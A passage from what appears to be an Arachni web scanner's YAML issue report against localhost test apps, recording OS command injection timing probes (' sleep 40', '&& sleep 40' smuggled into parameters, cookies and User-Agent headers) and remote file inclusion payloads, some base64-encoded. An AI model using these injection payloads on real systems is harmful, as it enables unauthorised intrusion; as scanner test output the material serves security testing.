:skip_orig: true
:injected_orig: ! ' sleep 40'
:altered: !binary |-
aW5wdXQ=
:element: link
:params:
!binary "aW5wdXQ=": ! ' sleep 40'
:follow_location: true
:injected: ! ' sleep 40'
:combo:
!binary "aW5wdXQ=": ! ' sleep 40'
:action: http://localhost:10769/solaris/link/straight?input=default
:silent: true
:regexp: ''
var: input
url: http://localhost:10769/solaris/link/straight?input=default
injected: ! ' sleep 40'
id:
regexp: ''
regexp_match:
elem: link
remarks: {}
method: GET
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie=cookie+value
response: {}
name: Operating system command injection (timing attack)
description: ! "The web application allows an attacker to\n execute arbitrary
OS commands even though it does not return\n the command output in the HTML
body.\n (This issue was discovered using a timing attack; timing attacks\n
\ can result in false positives in cases where the server takes\n an abnormally
long time to respond.\n Either case, these issues will require further investigation\n
\ even if they are false positives.)"
tags:
- os
- command
- code
- injection
- timing
- blind
cwe: '78'
cwe_url: http://cwe.mitre.org/data/definitions/78.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as OS level commands."
remedy_code: ''
metasploitable: unix/webapp/arachni_exec
mod_name: OS command injection (timing)
variations: []
internal_modname: OSCmdInjectionTiming
internal_modname: OSCmdInjectionTiming
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/OS_Command_Injection
var: cookie
url: http://localhost:10769/solaris/cookie/straight
elem: cookie
method: GET
name: Operating system command injection (timing attack)
description: ! "The web application allows an attacker to\n execute arbitrary
OS commands even though it does not return\n the command output in the HTML
body.\n (This issue was discovered using a timing attack; timing attacks\n
\ can result in false positives in cases where the server takes\n an abnormally
long time to respond.\n Either case, these issues will require further investigation\n
\ even if they are false positives.)"
tags:
- os
- command
- code
- injection
- timing
- blind
cwe: '78'
cwe_url: http://cwe.mitre.org/data/definitions/78.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as OS level commands."
remedy_code: ''
metasploitable: unix/webapp/arachni_exec
mod_name: OS command injection (timing)
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/OS_Command_Injection
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 1
:timeout: 28000.0
:timeout_divider: 1000
:timing_string: ! ' sleep __TIME__'
:skip_orig: true
:injected_orig: ! ' sleep 40'
:altered: !binary |-
Y29va2ll
:element: cookie
:params: {}
:follow_location: true
:cookies:
!binary "Y29va2ll": ! ' sleep 40'
:injected: ! ' sleep 40'
:combo:
!binary "Y29va2ll": ! ' sleep 40'
:action: http://localhost:10769/solaris/cookie/straight
:silent: true
:regexp: ''
var: cookie
url: http://localhost:10769/solaris/cookie/straight
injected: ! ' sleep 40'
id:
regexp: ''
regexp_match:
elem: cookie
remarks: {}
method: GET
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie=+sleep+40
response: {}
name: Operating system command injection (timing attack)
description: ! "The web application allows an attacker to\n execute arbitrary
OS commands even though it does not return\n the command output in the HTML
body.\n (This issue was discovered using a timing attack; timing attacks\n
\ can result in false positives in cases where the server takes\n an abnormally
long time to respond.\n Either case, these issues will require further investigation\n
\ even if they are false positives.)"
tags:
- os
- command
- code
- injection
- timing
- blind
cwe: '78'
cwe_url: http://cwe.mitre.org/data/definitions/78.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as OS level commands."
remedy_code: ''
metasploitable: unix/webapp/arachni_exec
mod_name: OS command injection (timing)
variations: []
internal_modname: OSCmdInjectionTiming
internal_modname: OSCmdInjectionTiming
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/OS_Command_Injection
var: User-Agent
url: http://localhost:10769/solaris/header/straight
elem: header
method: GET
name: Operating system command injection (timing attack)
description: ! "The web application allows an attacker to\n execute arbitrary
OS commands even though it does not return\n the command output in the HTML
body.\n (This issue was discovered using a timing attack; timing attacks\n
\ can result in false positives in cases where the server takes\n an abnormally
long time to respond.\n Either case, these issues will require further investigation\n
\ even if they are false positives.)"
tags:
- os
- command
- code
- injection
- timing
- blind
cwe: '78'
cwe_url: http://cwe.mitre.org/data/definitions/78.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as OS level commands."
remedy_code: ''
metasploitable: unix/webapp/arachni_exec
mod_name: OS command injection (timing)
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/OS_Command_Injection
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 1
:timeout: 28000.0
:timeout_divider: 1000
:timing_string: ! '&& sleep __TIME__'
:skip_orig: true
:injected_orig: ! '&& sleep 40'
:altered: User-Agent
:element: header
:params:
:follow_location: true
:headers:
User-Agent: ! '&& sleep 40'
:injected: ! '&& sleep 40'
:combo:
User-Agent: ! '&& sleep 40'
:action: http://localhost:10769/solaris/header/straight
:silent: true
:regexp: ''
var: User-Agent
url: http://localhost:10769/solaris/header/straight
injected: ! '&& sleep 40'
id:
regexp: ''
regexp_match:
elem: header
remarks: {}
method: GET
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: ! '&& sleep 40'
Cookie: cookie=cookie+value
response: {}
name: Operating system command injection (timing attack)
description: ! "The web application allows an attacker to\n execute arbitrary
OS commands even though it does not return\n the command output in the HTML
body.\n (This issue was discovered using a timing attack; timing attacks\n
\ can result in false positives in cases where the server takes\n an abnormally
long time to respond.\n Either case, these issues will require further investigation\n
\ even if they are false positives.)"
tags:
- os
- command
- code
- injection
- timing
- blind
cwe: '78'
cwe_url: http://cwe.mitre.org/data/definitions/78.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as OS level commands."
remedy_code: ''
metasploitable: unix/webapp/arachni_exec
mod_name: OS command injection (timing)
variations: []
internal_modname: OSCmdInjectionTiming
internal_modname: OSCmdInjectionTiming
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/OS_Command_Injection
var: input
url: http://localhost:10769/windows/form/straight
elem: form
method: POST
name: Operating system command injection (timing attack)
description: ! "The web application allows an attacker to\n execute arbitrary
OS commands even though it does not return\n the command output in the HTML
body.\n (This issue was discovered using a timing attack; timing attacks\n
\ can result in false positives in cases where the server takes\n an abnormally
long time to respond.\n Either case, these issues will require further investigation\n
\ even if they are false positives.)"
tags:
- os
- command
- code
- injection
- timing
- blind
cwe: '78'
cwe_url: http://cwe.mitre.org/data/definitions/78.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as OS level commands."
remedy_code: ''
metasploitable: unix/webapp/arachni_exec
mod_name: OS command injection (timing)
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/OS_Command_Injection
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 1
:timeout: 28000.0
:timeout_divider: 1000
:timing_string: ! ' sleep __TIME__'
:skip_orig: true
:injected_orig: ! ' sleep 40'
:altered: !binary |-
aW5wdXQ=
:element: form
:params:
!binary "aW5wdXQ=": ! ' sleep 40'
:follow_location: true
:injected: ! ' sleep 40'
:combo:
!binary "aW5wdXQ=": ! ' sleep 40'
:action: http://localhost:10769/windows/form/straight
:silent: true
:regexp: ''
var: input
url: http://localhost:10769/windows/form/straight
injected: ! ' sleep 40'
id:
regexp: ''
regexp_match:
elem: form
remarks: {}
method: POST
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie=cookie+value
response: {}
name: Operating system command injection (timing attack)
description: ! "The web application allows an attacker to\n execute arbitrary
OS commands even though it does not return\n the command output in the HTML
body.\n (This issue was discovered using a timing attack; timing attacks\n
\ can result in false positives in cases where the server takes\n an abnormally
long time to respond.\n Either case, these issues will require further investigation\n
\ even if they are false positives.)"
tags:
- os
- command
- code
- injection
- timing
- blind
cwe: '78'
cwe_url: http://cwe.mitre.org/data/definitions/78.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as OS level commands."
remedy_code: ''
metasploitable: unix/webapp/arachni_exec
mod_name: OS command injection (timing)
variations: []
internal_modname: OSCmdInjectionTiming
internal_modname: OSCmdInjectionTiming
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/OS_Command_Injection
var: input
url: http://localhost:10769/windows/link/straight?input=default
elem: link
method: GET
name: Operating system command injection (timing attack)
description: ! "The web application allows an attacker to\n execute arbitrary
OS commands even though it does not return\n the command output in the HTML
body.\n (This issue was discovered using a timing attack; timing attacks\n
\ can result in false positives in cases where the server takes\n an abnormally
long time to respond.\n Either case, these issues will require further investigation\n
\ even if they are false positives.)"
tags:
- os
- command
- code
- injection
- timing
- blind
cwe: '78'
cwe_url: http://cwe.mitre.org/data/definitions/78.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as OS level commands."
remedy_code: ''
metasploitable: unix/webapp/arachni_exec
mod_name: OS command injection (timing)
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/OS_Command_Injection
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 1
:timeout: 28000.0
:timeout_divider: 1000
:timing_string: ! ' sleep __TIME__'
:skip_orig: true
:injected_orig: ! ' sleep 40'
:altered: !binary |-
aW5wdXQ=
:element: link
:params:
!binary "aW5wdXQ=": ! ' sleep 40'
:follow_location: true
:injected: ! ' sleep 40'
:combo:
!binary "aW5wdXQ=": ! ' sleep 40'
:action: http://localhost:10769/windows/link/straight?input=default
:silent: true
:regexp: ''
var: input
url: http://localhost:10769/windows/link/straight?input=default
injected: ! ' sleep 40'
id:
regexp: ''
regexp_match:
elem: link
remarks: {}
method: GET
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie=cookie+value
response: {}
name: Operating system command injection (timing attack)
description: ! "The web application allows an attacker to\n execute arbitrary
OS commands even though it does not return\n the command output in the HTML
body.\n (This issue was discovered using a timing attack; timing attacks\n
\ can result in false positives in cases where the server takes\n an abnormally
long time to respond.\n Either case, these issues will require further investigation\n
\ even if they are false positives.)"
tags:
- os
- command
- code
- injection
- timing
- blind
cwe: '78'
cwe_url: http://cwe.mitre.org/data/definitions/78.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as OS level commands."
remedy_code: ''
metasploitable: unix/webapp/arachni_exec
mod_name: OS command injection (timing)
variations: []
internal_modname: OSCmdInjectionTiming
internal_modname: OSCmdInjectionTiming
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/OS_Command_Injection
var: cookie
url: http://localhost:10769/windows/cookie/straight
elem: cookie
method: GET
name: Operating system command injection (timing attack)
description: ! "The web application allows an attacker to\n execute arbitrary
OS commands even though it does not return\n the command output in the HTML
body.\n (This issue was discovered using a timing attack; timing attacks\n
\ can result in false positives in cases where the server takes\n an abnormally
long time to respond.\n Either case, these issues will require further investigation\n
\ even if they are false positives.)"
tags:
- os
- command
- code
- injection
- timing
- blind
cwe: '78'
cwe_url: http://cwe.mitre.org/data/definitions/78.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as OS level commands."
remedy_code: ''
metasploitable: unix/webapp/arachni_exec
mod_name: OS command injection (timing)
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/OS_Command_Injection
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 1
:timeout: 28000.0
:timeout_divider: 1000
:timing_string: ! ' sleep __TIME__'
:skip_orig: true
:injected_orig: ! ' sleep 40'
:altered: !binary |-
Y29va2ll
:element: cookie
:params: {}
:follow_location: true
:cookies:
!binary "Y29va2ll": ! ' sleep 40'
:injected: ! ' sleep 40'
:combo:
!binary "Y29va2ll": ! ' sleep 40'
:action: http://localhost:10769/windows/cookie/straight
:silent: true
:regexp: ''
var: cookie
url: http://localhost:10769/windows/cookie/straight
injected: ! ' sleep 40'
id:
regexp: ''
regexp_match:
elem: cookie
remarks: {}
method: GET
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie=+sleep+40
response: {}
name: Operating system command injection (timing attack)
description: ! "The web application allows an attacker to\n execute arbitrary
OS commands even though it does not return\n the command output in the HTML
body.\n (This issue was discovered using a timing attack; timing attacks\n
\ can result in false positives in cases where the server takes\n an abnormally
long time to respond.\n Either case, these issues will require further investigation\n
\ even if they are false positives.)"
tags:
- os
- command
- code
- injection
- timing
- blind
cwe: '78'
cwe_url: http://cwe.mitre.org/data/definitions/78.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as OS level commands."
remedy_code: ''
metasploitable: unix/webapp/arachni_exec
mod_name: OS command injection (timing)
variations: []
internal_modname: OSCmdInjectionTiming
internal_modname: OSCmdInjectionTiming
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/OS_Command_Injection
var: User-Agent
url: http://localhost:10769/windows/header/straight
elem: header
method: GET
name: Operating system command injection (timing attack)
description: ! "The web application allows an attacker to\n execute arbitrary
OS commands even though it does not return\n the command output in the HTML
body.\n (This issue was discovered using a timing attack; timing attacks\n
\ can result in false positives in cases where the server takes\n an abnormally
long time to respond.\n Either case, these issues will require further investigation\n
\ even if they are false positives.)"
tags:
- os
- command
- code
- injection
- timing
- blind
cwe: '78'
cwe_url: http://cwe.mitre.org/data/definitions/78.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as OS level commands."
remedy_code: ''
metasploitable: unix/webapp/arachni_exec
mod_name: OS command injection (timing)
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/OS_Command_Injection
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 1
:timeout: 28000.0
:timeout_divider: 1000
:timing_string: ! '&& sleep __TIME__'
:skip_orig: true
:injected_orig: ! '&& sleep 40'
:altered: User-Agent
:element: header
:params:
:follow_location: true
:headers:
User-Agent: ! '&& sleep 40'
:injected: ! '&& sleep 40'
:combo:
User-Agent: ! '&& sleep 40'
:action: http://localhost:10769/windows/header/straight
:silent: true
:regexp: ''
var: User-Agent
url: http://localhost:10769/windows/header/straight
injected: ! '&& sleep 40'
id:
regexp: ''
regexp_match:
elem: header
remarks: {}
method: GET
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: ! '&& sleep 40'
Cookie: cookie=cookie+value
response: {}
name: Operating system command injection (timing attack)
description: ! "The web application allows an attacker to\n execute arbitrary
OS commands even though it does not return\n the command output in the HTML
body.\n (This issue was discovered using a timing attack; timing attacks\n
\ can result in false positives in cases where the server takes\n an abnormally
long time to respond.\n Either case, these issues will require further investigation\n
\ even if they are false positives.)"
tags:
- os
- command
- code
- injection
- timing
- blind
cwe: '78'
cwe_url: http://cwe.mitre.org/data/definitions/78.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as OS level commands."
remedy_code: ''
metasploitable: unix/webapp/arachni_exec
mod_name: OS command injection (timing)
variations: []
internal_modname: OSCmdInjectionTiming
internal_modname: OSCmdInjectionTiming
- !ruby/object:Arachni::Issue
verification: false
references:
WASC: http://projects.webappsec.org/Remote-File-Inclusion
Wikipedia: http://en.wikipedia.org/wiki/Remote_File_Inclusion
var: input
url: http://localhost:5571/form/straight
elem: form
method: GET
name: Remote File Inclusion
description: ! "The web application can be forced to include\n 3rd party remote
content which can often lead to arbitrary code\n execution, amongst other attacks."
tags:
- remote
- file
- inclusion
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "Enforce strict validation and filtering\n on
user inputs."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_include
mod_name: Remote File Inclusion
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
WASC: http://projects.webappsec.org/Remote-File-Inclusion
Wikipedia: http://en.wikipedia.org/wiki/Remote_File_Inclusion
opts:
:redundant: false
:async: true
:regexp: 705cd559b16e6946826207c2199bd890
:match: 705cd559b16e6946826207c2199bd890
:substring: 705cd559b16e6946826207c2199bd890
:ignore:
:elements:
- link
- form
- cookie
- header
- body
:train:
:follow_location: false
:injected_orig: arachni.github.com/arachni/rfi.md5.txt
:altered: !binary |-
aW5wdXQ=
:element: form
:params:
!binary "aW5wdXQ=": !binary |-
YXJhY2huaS5naXRodWIuY29tL2FyYWNobmkvcmZpLm1kNS50eHQA
:injected: !binary |-
YXJhY2huaS5naXRodWIuY29tL2FyYWNobmkvcmZpLm1kNS50eHQA
:combo:
!binary "aW5wdXQ=": !binary |-
YXJhY2huaS5naXRodWIuY29tL2FyYWNobmkvcmZpLm1kNS50eHQA
:action: http://localhost:5571/form/straight
:verification: false
:id: 705cd559b16e6946826207c2199bd890
var: input
url: http://localhost:5571/form/straight
injected: !binary |-
YXJhY2huaS5naXRodWIuY29tL2FyYWNobmkvcmZpLm1kNS50eHQA
id: 705cd559b16e6946826207c2199bd890
regexp: 705cd559b16e6946826207c2199bd890
regexp_match: 705cd559b16e6946826207c2199bd890
elem: form
remarks: {}
method: GET
response: ! '705cd559b16e6946826207c2199bd890
'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie=cookie+value;cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMjoyNjowNiBHTVQ=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MzM=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Remote File Inclusion
description: ! "The web application can be forced to include\n 3rd party remote
content which can often lead to arbitrary code\n execution, amongst other
attacks."
tags:
- remote
- file
- inclusion
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "Enforce strict validation and filtering\n on
user inputs."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_include
mod_name: Remote File Inclusion
variations: []
internal_modname: RFI
internal_modname: RFI
- !ruby/object:Arachni::Issue
verification: false
references:
WASC: http://projects.webappsec.org/Remote-File-Inclusion
Wikipedia: http://en.wikipedia.org/wiki/Remote_File_Inclusion
var: input
url: http://localhost:5571/form/append
elem: form
method: GET
name: Remote File Inclusion
description: ! "The web application can be forced to include\n 3rd party remote
content which can often lead to arbitrary code\n execution, amongst other attacks."
tags:
- remote
- file
- inclusion
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "Enforce strict validation and filtering\n on
user inputs."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_include
mod_name: Remote File Inclusion
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
WASC: http://projects.webappsec.org/Remote-File-Inclusion
Wikipedia: http://en.wikipedia.org/wiki/Remote_File_Inclusion
opts:
:redundant: false
:async: true
:regexp: 705cd559b16e6946826207c2199bd890
:match: 705cd559b16e6946826207c2199bd890
:substring: 705cd559b16e6946826207c2199bd890
:ignore:
:elements:
- link
- form
- cookie
- header
- body
:train:
:follow_location: false
:injected_orig: arachni.github.com/arachni/rfi.md5.txt
:altered: !binary |-
aW5wdXQ=
:element: form
:params:
!binary "aW5wdXQ=": !binary |-
ZGVmYXVsdGFyYWNobmkuZ2l0aHViLmNvbS9hcmFjaG5pL3JmaS5tZDUudHh0
AA==
:injected: !binary |-
ZGVmYXVsdGFyYWNobmkuZ2l0aHViLmNvbS9hcmFjaG5pL3JmaS5tZDUudHh0
AA==
:combo:
!binary "aW5wdXQ=": !binary |-
ZGVmYXVsdGFyYWNobmkuZ2l0aHViLmNvbS9hcmFjaG5pL3JmaS5tZDUudHh0
AA==
:action: http://localhost:5571/form/append
:verification: false
:id: 705cd559b16e6946826207c2199bd890
var: input
url: http://localhost:5571/form/append
injected: !binary |-
ZGVmYXVsdGFyYWNobmkuZ2l0aHViLmNvbS9hcmFjaG5pL3JmaS5tZDUudHh0
AA==
id: 705cd559b16e6946826207c2199bd890
regexp: 705cd559b16e6946826207c2199bd890
regexp_match: 705cd559b16e6946826207c2199bd890
elem: form
remarks: {}
method: GET
response: ! '705cd559b16e6946826207c2199bd890
'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie=cookie+value;cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMjoyNjowNyBHTVQ=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MzM=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Remote File Inclusion
description: ! "The web application can be forced to include\n 3rd party remote
content which can often lead to arbitrary code\n execution, amongst other
attacks."
tags:
- remote
- file
- inclusion
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "Enforce strict validation and filtering\n on
user inputs."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_include
mod_name: Remote File Inclusion
variations: []
internal_modname: RFI
internal_modname: RFI
- !ruby/object:Arachni::Issue
verification: false
references:
WASC: http://projects.webappsec.org/Remote-File-Inclusion
Wikipedia: http://en.wikipedia.org/wiki/Remote_File_Inclusion
var: input
url: http://localhost:5571/link/straight?input=default
elem: link
method: GET
name: Remote File Inclusion
description: ! "The web application can be forced to include\n 3rd party remote
content which can often lead to arbitrary code\n execution, amongst other attacks."
tags:
- remote
- file
- inclusion
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "Enforce strict validation and filtering\n on
user inputs."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_include
mod_name: Remote File Inclusion
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
WASC: http://projects.webappsec.org/Remote-File-Inclusion
Wikipedia: http://en.wikipedia.org/wiki/Remote_File_Inclusion
opts:
:redundant: false
:async: true
:regexp: 705cd559b16e6946826207c2199bd890
:match: 705cd559b16e6946826207c2199bd890
:substring: 705cd559b16e6946826207c2199bd890
:ignore:
:elements:
- link
- form
- cookie
- header
- body
:train:
:follow_location: false
:injected_orig: arachni.github.com/arachni/rfi.md5.txt
:altered: !binary |-
aW5wdXQ=
:element: link
:params:
!binary "aW5wdXQ=": arachni.github.com/arachni/rfi.md5.txt
:injected: arachni.github.com/arachni/rfi.md5.txt
:combo:
!binary "aW5wdXQ=": arachni.github.com/arachni/rfi.md5.txt
:action: http://localhost:5571/link/straight?input=default
:verification: false
:id: 705cd559b16e6946826207c2199bd890
var: input
url: http://localhost:5571/link/straight?input=default
injected: arachni.github.com/arachni/rfi.md5.txt
id: 705cd559b16e6946826207c2199bd890
regexp: 705cd559b16e6946826207c2199bd890
regexp_match: 705cd559b16e6946826207c2199bd890
elem: link
remarks: {}
method: GET
response: ! '705cd559b16e6946826207c2199bd890
'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value;cookie=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMjoyNjoxNiBHTVQ=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MzM=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Remote File Inclusion
description: ! "The web application can be forced to include\n 3rd party remote
content which can often lead to arbitrary code\n execution, amongst other
attacks."
tags:
- remote
- file
- inclusion
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "Enforce strict validation and filtering\n on
user inputs."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_include
mod_name: Remote File Inclusion
variations: []
internal_modname: RFI
internal_modname: RFI
- !ruby/object:Arachni::Issue
verification: false
references:
WASC: http://projects.webappsec.org/Remote-File-Inclusion
Wikipedia: http://en.wikipedia.org/wiki/Remote_File_Inclusion
var: input
url: http://localhost:5571/link/append?input=default
elem: link
method: GET
name: Remote File Inclusion
description: ! "The web application can be forced to include\n 3rd party remote
content which can often lead to arbitrary code\n execution, amongst other attacks."
tags:
- remote
- file
- inclusion
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "Enforce strict validation and filtering\n on
user inputs."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_include
mod_name: Remote File Inclusion
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
WASC: http://projects.webappsec.org/Remote-File-Inclusion
Wikipedia: http://en.wikipedia.org/wiki/Remote_File_Inclusion
opts:
:redundant: false
:async: true
:regexp: 705cd559b16e6946826207c2199bd890
:match: 705cd559b16e6946826207c2199bd890
:substring: 705cd559b16e6946826207c2199bd890
:ignore:
:elements:
- link
- form
- cookie
- header
- body
:train:
:follow_location: false
:injected_orig: hTtP://arachni.github.com/arachni/rfi.md5.txt
:altered: !binary |-
aW5wdXQ=
:element: link
:params:
!binary "aW5wdXQ=": !binary |-
ZGVmYXVsdGhUdFA6Ly9hcmFjaG5pLmdpdGh1Yi5jb20vYXJhY2huaS9yZmku
bWQ1LnR4dAA=
:injected: !binary |-
ZGVmYXVsdGhUdFA6Ly9hcmFjaG5pLmdpdGh1Yi5jb20vYXJhY2huaS9yZmku
bWQ1LnR4dAA=
:combo:
!binary "aW5wdXQ=": !binary |-
ZGVmYXVsdGhUdFA6Ly9hcmFjaG5pLmdpdGh1Yi5jb20vYXJhY2huaS9yZmku
bWQ1LnR4dAA=
:action: http://localhost:5571/link/append?input=default
:verification: false
:id: 705cd559b16e6946826207c2199bd890
var: input
url: http://localhost:5571/link/append?input=default
injected: !binary |-
ZGVmYXVsdGhUdFA6Ly9hcmFjaG5pLmdpdGh1Yi5jb20vYXJhY2huaS9yZmku
bWQ1LnR4dAA=
id: 705cd559b16e6946826207c2199bd890
regexp: 705cd559b16e6946826207c2199bd890
regexp_match: 705cd559b16e6946826207c2199bd890
elem: link
remarks: {}
method: GET
response: ! '705cd559b16e6946826207c2199bd890
'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value;cookie=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "U2VydmVy": !binary |-
